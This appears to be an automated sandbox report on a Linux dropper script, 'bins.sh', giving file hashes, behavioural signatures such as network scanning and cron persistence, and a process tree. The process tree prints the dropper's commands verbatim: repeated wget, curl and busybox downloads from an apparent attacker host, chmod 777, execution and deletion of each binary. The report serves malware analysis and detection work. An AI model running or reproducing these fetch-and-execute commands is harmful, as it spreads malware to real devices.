Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    04-11-2024 21:22

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    41b94196f704ad7c3697022b3e4ea893

  • SHA1

    4051a27e6c6dd7dccb725ab92e8c7dea796c72e3

  • SHA256

    ee6db48d4a61adc6012c6afd4d9f710bd063ce9ce5843007de2d905d9ded473b

  • SHA512

    46596bb551d352dd6c2c1526b28b6b8f5ed92639fdfedbc4129ea2c1b9c5e669f6b826a6bf4ec8a5c70115cc47a49a59585fe583f5b17ced0d102e5cd6ebdacd

  • SSDEEP

    192:zDl9wXPD1sL99yFRf6znqFlZiPpl9v99yFRkznqFlNM:zDl9wXr1sMN6znqFlZixl9oWznqFlNM

Malware Config

Signatures

  • Contacts a large (2042) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 4 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 13 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:647
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:651
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq
          2⤵
          • System Network Configuration Discovery
          PID:653
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq
          2⤵
          • Checks CPU configuration
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:658
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq
          2⤵
          • System Network Configuration Discovery
          PID:674
        • /bin/chmod
          chmod 777 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq
          2⤵
          • File and Directory Permissions Modification
          PID:677
        • /tmp/3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq
          ./3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq
          2⤵
          • Executes dropped EXE
          • Renames itself
          • Reads runtime system information
          PID:678
          • /bin/sh
            sh -c "crontab -l"
            3⤵
              PID:680
              • /usr/bin/crontab
                crontab -l
                4⤵
                • Reads runtime system information
                PID:681
            • /bin/sh
              sh -c "crontab -"
              3⤵
                PID:683
                • /usr/bin/crontab
                  crontab -
                  4⤵
                  • Creates/modifies Cron job
                  PID:684
            • /bin/rm
              rm 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq
              2⤵
                PID:686
              • /usr/bin/wget
                wget http://conn.masjesu.zip/bins/q8L7Nf4v4nWCeQdj5uFk6ooIuCHu2YZ0fF
                2⤵
                • System Network Configuration Discovery
                PID:690
              • /usr/bin/curl
                curl -O http://conn.masjesu.zip/bins/q8L7Nf4v4nWCeQdj5uFk6ooIuCHu2YZ0fF
                2⤵
                • System Network Configuration Discovery
                PID:691
              • /bin/busybox
                /bin/busybox wget http://conn.masjesu.zip/bins/q8L7Nf4v4nWCeQdj5uFk6ooIuCHu2YZ0fF
                2⤵
                • System Network Configuration Discovery
                PID:772
              • /bin/chmod
                chmod 777 q8L7Nf4v4nWCeQdj5uFk6ooIuCHu2YZ0fF
                2⤵
                • File and Directory Permissions Modification
                PID:773
              • /tmp/q8L7Nf4v4nWCeQdj5uFk6ooIuCHu2YZ0fF
                ./q8L7Nf4v4nWCeQdj5uFk6ooIuCHu2YZ0fF
                2⤵
                  PID:774
                • /bin/rm
                  rm q8L7Nf4v4nWCeQdj5uFk6ooIuCHu2YZ0fF
                  2⤵
                    PID:775
                  • /usr/bin/wget
                    wget http://conn.masjesu.zip/bins/GTzGbuekv82AYjNujuq9hoRr8lG7vB39Re
                    2⤵
                    • System Network Configuration Discovery
                    PID:776
                  • /usr/bin/curl
                    curl -O http://conn.masjesu.zip/bins/GTzGbuekv82AYjNujuq9hoRr8lG7vB39Re
                    2⤵
                    • System Network Configuration Discovery
                    PID:777
                  • /bin/busybox
                    /bin/busybox wget http://conn.masjesu.zip/bins/GTzGbuekv82AYjNujuq9hoRr8lG7vB39Re
                    2⤵
                    • System Network Configuration Discovery
                    PID:778
                  • /bin/chmod
                    chmod 777 GTzGbuekv82AYjNujuq9hoRr8lG7vB39Re
                    2⤵
                    • File and Directory Permissions Modification
                    PID:779
                  • /tmp/GTzGbuekv82AYjNujuq9hoRr8lG7vB39Re
                    ./GTzGbuekv82AYjNujuq9hoRr8lG7vB39Re
                    2⤵
                      PID:780
                    • /bin/rm
                      rm GTzGbuekv82AYjNujuq9hoRr8lG7vB39Re
                      2⤵
                        PID:781
                      • /usr/bin/wget
                        wget http://conn.masjesu.zip/bins/E2wNZ7yKREMYc1cnARbkEc0CzhdNuWIlHc
                        2⤵
                        • System Network Configuration Discovery
                        PID:782
                      • /usr/bin/curl
                        curl -O http://conn.masjesu.zip/bins/E2wNZ7yKREMYc1cnARbkEc0CzhdNuWIlHc
                        2⤵
                        • System Network Configuration Discovery
                        PID:783
                      • /bin/busybox
                        /bin/busybox wget http://conn.masjesu.zip/bins/E2wNZ7yKREMYc1cnARbkEc0CzhdNuWIlHc
                        2⤵
                        • System Network Configuration Discovery
                        PID:784
                      • /bin/chmod
                        chmod 777 E2wNZ7yKREMYc1cnARbkEc0CzhdNuWIlHc
                        2⤵
                        • File and Directory Permissions Modification
                        PID:787
                      • /tmp/E2wNZ7yKREMYc1cnARbkEc0CzhdNuWIlHc
                        ./E2wNZ7yKREMYc1cnARbkEc0CzhdNuWIlHc
                        2⤵
                          PID:788
                        • /bin/rm
                          rm E2wNZ7yKREMYc1cnARbkEc0CzhdNuWIlHc
                          2⤵
                            PID:789
                          • /usr/bin/wget
                            wget http://conn.masjesu.zip/bins/8WFounZGbZXsMF4FelpDqK2Vxd7WpulXMs
                            2⤵
                            • System Network Configuration Discovery
                            PID:790

                        Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • /tmp/3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq

                          Filesize

                          141KB

                          MD5

                          3ca8decdb1e52c423c521bfff02ac200

                          SHA1

                          8621ecd6807109b8541912ad9e134f6fb49bfd48

                          SHA256

                          dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f

                          SHA512

                          b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

                        • /var/spool/cron/crontabs/tmp.hVkzFB

                          Filesize

                          210B

                          MD5

                          83501a8b256c5b4ca270b67078e4a7e1

                          SHA1

                          ac6bb053113fd3b10440d025aa3e1f88b3cd8598

                          SHA256

                          7d83ce19ced840637d8b26a84d8a1864c12547acc6a9ef2f7e0c6d8b3a6d8451

                          SHA512

                          3ac20b87912469443cbab3cbeeabcf243ade39c848df6bb079a6f545f98b4f08b89b6257e0d48ff19ce04b3a6ccf49af4c07093774c4aa751407c6f640793554